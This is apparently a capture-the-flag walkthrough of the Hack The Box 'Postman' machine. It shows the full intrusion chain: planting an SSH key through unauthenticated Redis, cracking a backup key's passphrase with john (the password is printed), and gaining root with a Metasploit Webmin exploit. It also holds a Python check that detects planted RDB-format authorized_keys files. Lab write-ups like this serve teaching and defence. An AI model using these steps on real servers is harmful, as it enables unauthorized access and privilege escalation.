HTB-postman

Port scan

nmap -sC -sV -oA path postman.htb
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Login to Webmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Webmin version 19.1 is found, but after several attempts it seems the password reset feature is not enabled.
After some searching online, I found a Redis port that nmap had not scanned:

PORT     STATE SERVICE    VERSION                                
6379/tcp open  tcpwrapped    

Redis unauthenticated access

Generate an SSH key pair and write the public key into Redis

Generate the SSH key pair
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
Write it into Redis
cat /root/.ssh/key.txt | redis-cli -h 10.10.10.160 -x set xxx

Connect to Redis and import the public key

Connect to Redis
redis-cli -h 10.10.10.160
Import the public key
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized_keys"
save

SSH in as the redis user

ssh -i /root/.ssh/id_rsa redis@10.10.10.160
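From the defender's side, the CONFIG SET dir/dbfilename + SAVE trick above leaves a tell-tale artifact: the resulting authorized_keys file is not text but an RDB snapshot, which starts with the magic bytes "REDIS" plus a four-digit format version and wraps the planted key in binary metadata. The following check is an added example, not part of the original writeup; the sample blobs and the paths are constructed.

```python
import re
from pathlib import Path

# Redis RDB dumps begin with the ASCII magic "REDIS" plus a 4-digit format version.
RDB_MAGIC = re.compile(rb"\AREDIS\d{4}")
# Public key entries that sshd would accept from the file.
SSH_KEY = re.compile(rb"(?:ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) [A-Za-z0-9+/=]+")
# Bytes a genuine (plain-text) authorized_keys file may contain.
TEXT_BYTES = set(range(0x20, 0x7F)) | set(b"\r\n\t")


def analyse_authorized_keys(data: bytes) -> dict:
    """Classify one authorized_keys blob.

    A genuine file is plain text. A file produced by a Redis SAVE is an RDB
    snapshot: RDB header, binary metadata, and the planted key sitting between
    the newline padding that was prepended and appended before the write.
    """
    has_rdb_header = bool(RDB_MAGIC.match(data))
    has_binary = any(b not in TEXT_BYTES for b in data)
    keys = [m.group(0).decode("ascii") for m in SSH_KEY.finditer(data)]
    return {
        "rdb_header": has_rdb_header,
        "binary_content": has_binary,
        "keys": keys,
        "suspicious": has_rdb_header or (has_binary and bool(keys)),
    }


def scan_paths(paths) -> list:
    """Run the check over the authorized_keys files that exist; returns findings."""
    findings = []
    for p in map(Path, paths):
        if p.is_file():
            result = analyse_authorized_keys(p.read_bytes())
            result["path"] = str(p)
            findings.append(result)
    return findings


# Constructed sample of what a SAVE into .ssh/authorized_keys looks like (abridged RDB).
PLANTED = (b"REDIS0009\xfa\tredis-ver\x055.0.7\xfa\nredis-bits\xc0@\xfe\x00\xfb\x01\x00"
           b"\x00\x03xxx\xc3\x00\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0demo== attacker@kali\n\n\n"
           b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0")
# Constructed sample of a legitimate file.
CLEAN = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDemoDemoDemoDemoDemoDemoDemoDemoDemoDemo admin@postman\n"

if __name__ == "__main__":
    for name, blob in (("planted", PLANTED), ("clean", CLEAN)):
        print(name, analyse_authorized_keys(blob))
    print(scan_paths(["/var/lib/redis/.ssh/authorized_keys"]))  # path used on the box
```

The same RDB header check applies to any file a writable Redis dump could be pointed at (cron spool, web root), not only authorized_keys.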

Locate user.txt

redis@Postman:/opt$ locate user.txt                   
/home/Matt/user.txt  
redis@Postman:/opt$ ls -la /home/Matt/user.txt    
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt   

Obtain Matt's private key

Matt's password is needed. The nmap results show SSH is open on the box, so look for Matt's SSH private key:

redis@Postman:/opt$ locate id_rsa*                         
/opt/id_rsa.bak  
redis@Postman:/opt$ ls -la /opt/id_rsa.bak           
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak   

Password cracking

Crack the key passphrase with john on the attacking machine:

python3 /usr/share/john/ssh2john.py Matt_pass.txt > pass
john --wordlist=/usr/share/wordlists/rockyou.txt pass

Matt's user password: computer2008

Switch user and get the flag

redis@Postman:/opt$ su Matt               
Password:                                           
Matt@Postman:~$ wc -c user.txt              
33 user.txt  

Getting root

Webmin is version 19.1; use the Metasploit module to get root:

msf5 > search webmin
msf5 exploit(linux/http/webmin_backdoor) > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > setg username Matt      
username => Matt 
msf5 exploit(linux/http/webmin_packageup_rce) > setg password computer2008 
password => computer2008  
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160 
rhosts => 10.10.10.160 

Note that ssl must be set to true,
otherwise the connection cannot be established:

msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true 
ssl => true

Get the flag

wc -c /root/root.txt
33 /root/root.txt
